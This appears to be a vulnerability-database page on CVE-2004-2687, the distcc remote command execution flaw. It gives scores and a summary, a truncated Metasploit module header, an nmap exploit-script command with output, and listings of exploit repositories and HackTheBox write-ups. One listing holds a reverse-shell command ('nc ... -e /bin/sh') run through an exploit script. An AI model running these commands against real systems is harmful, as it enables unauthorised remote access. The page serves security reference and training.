CVE-2004-2687

Published: 31/12/2004 Updated: 05/09/2008
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 953
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote malicious users to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.

Vulnerable Product

samba samba

apple xcode 1.5

Exploits

##
# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##

require 'msf/core'

class Me ...

Nmap Scripts

distcc-cve2004-2687

Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementations due to poor configuration of the service.

nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec:
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|     Description:
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|
|     Disclosure date: 2002-02-01
|     Extra information:
|
|     uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup)
|
|     References:
|       http://distcc.googlecode.com/svn/trunk/doc/web/security.html
|       http://http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687
|       http://http://www.osvdb.org/13378
|_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687

Github Repositories

Generate vulnerable virtual machines on the fly (current team development is taking place in the cliffe/SecGen fork)

DEVELOPMENT HAS MOVED TO github.com/cliffe/SecGen/, THIS REPO IS NOT MAINTAINED AND WILL LIKELY NOT WORK! Security Scenario Generator (SecGen). Summary: SecGen creates vulnerable virtual machines so students can learn security penetration testing techniques. Boxes like Metasploitable2 are always the same, this project uses Vagrant, Puppet, and Ruby to create randomly vulne

distccd_rce_CVE-2004-2687 🖥️ -k4u5h41- #️⃣ CVE-2004-2687 #️⃣ This is a Python 2 script and #️⃣ tested on kali 2021.2 nc -lvp 1403 python2 distccd_rce_CVE-2004-2687.py -t 1010103 -p 3632 -c "nc 10101412 1403 -e /bin/sh"

DistCC exploit

DistCC Daemon Exploit (CVE-2004-2687). This project was created with the purpose of taking full advantage of the vulnerability CVE-2004-2687 in a simple way using Python; it allows remote command execution if the right conditions are given. How to use: python3 distcc_cve-2004-2687_exploit.py -i <ip> -p <port>

CVE-2004-2687 DistCC Daemon Command Execution

HTB write-ups going through TJnull's VM list on HackTheBox.

HackTheBox Writeups A collection of write-ups going through TJnull's VM list for machines hosted on HackTheBox Linux Boxes Machine Tags Writeup #CVE-2004-2687 #CVE-2007-2447 #CVE-2011-2523 #vsFTPd #smbd #nmap HTB Lame #shellshock #CVE-2014-6271 #perl HTB Shocker HTB Bashed #mimebypass #ifcfg HTB Networked Windows Boxes

Hack the Box Ethical Hacking - Lame. The targeted machine is Lame. nmap: First thing first, we run a quick initial nmap scan to see which ports are open and which services are running on those ports. Run nmap to scan the machine: nmap -vvv -n -Pn -p0-65535 -oG allPolrs 10129114132 # Nmap 792 scan initiated Sat Apr 9 05:28:51 2022 as: nmap -vvv -n -Pn -p0-65535 -oG allPolrs 1

Lame HTB. Today, let's look at another easy HackTheBox machine created by ch4p, Lame. We have the IP (1010103) and the OS (Linux). After running the same port discovery script used for Legacy, the scan gives us the machine name (lame), the domain (hacktheboxgr) and the domai